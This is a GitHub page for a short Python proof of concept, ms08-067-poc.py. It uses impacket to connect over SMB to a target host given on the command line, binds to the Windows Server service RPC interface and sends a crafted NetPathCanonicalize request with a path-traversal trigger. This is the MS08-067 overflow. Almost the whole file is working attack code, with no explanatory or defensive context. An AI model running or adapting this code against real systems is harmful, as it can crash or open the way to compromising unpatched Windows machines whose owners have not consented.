-
Notifications
You must be signed in to change notification settings - Fork 0
/
ms08-067-poc.py
55 lines (42 loc) · 1.56 KB
/
ms08-067-poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/python
# from impacket import smb
from impacket import uuid
from impacket.dcerpc.v5 import transport
import struct
import sys
try:
target = sys.argv[1]
port = 445
except IndexError:
print("Usage: %s HOST" % sys.argv[0])
sys.exit()
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
trans.connect()
dce = trans.DCERPC_class(trans)
dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
stub = '\x01\x00\x00\x00' # Reference ID
stub += '\x10\x00\x00\x00' # Server UNC - Max Buffer Count
stub += '\x00\x00\x00\x00' # Offset
stub += '\x10\x00\x00\x00' # Server UNC - Actual Buffer Count
stub += '\xCC'*28 # Server UNC Buffer Content
stub += '\x00\x00\x00\x00' # Server UNC Trailing Null Bytes
# RPC Path
stub += '\x2f\x00\x00\x00' # RPC Path - Max Buffer Count
stub += '\x00\x00\x00\x00' # Offset
stub += '\x2f\x00\x00\x00' # RPC Path - Actual Buffer Count
# Trigger Path = \A\..\..\
stub += '\x41\x00\x5c\x00\x2e\x00\x2e\x00' # Trigger Path
stub += '\x5c\x00\x2e\x00\x2e\x00\x5c\x00' # Trigger Path
stub += '\x41'*74 # Trigger Path
# Misc
stub += '\x00\x00' # Padding
stub += '\x00\x00\x00\x00' # Max Buffer Count
stub += '\x02\x00\x00\x00' # Prefix - Max Unicode Count
stub += '\x02\x00\x00\x00' # Offset
stub += '\x00\x00\x00\x00' # Prefix - Actual Unicode Count
stub += '\x02\x00\x00\x00'
stub += '\x5c\x00\x00\x00' # Prefix + Trailing Null Bytes
stub += '\x01\x00\x00\x00' # Pointer to Path Type
stub += '\x01\x00\x00\x00' # Path type and flags
print("Sending Payload ->")
dce.call(0x1f, stub) # NetPathCanonicalize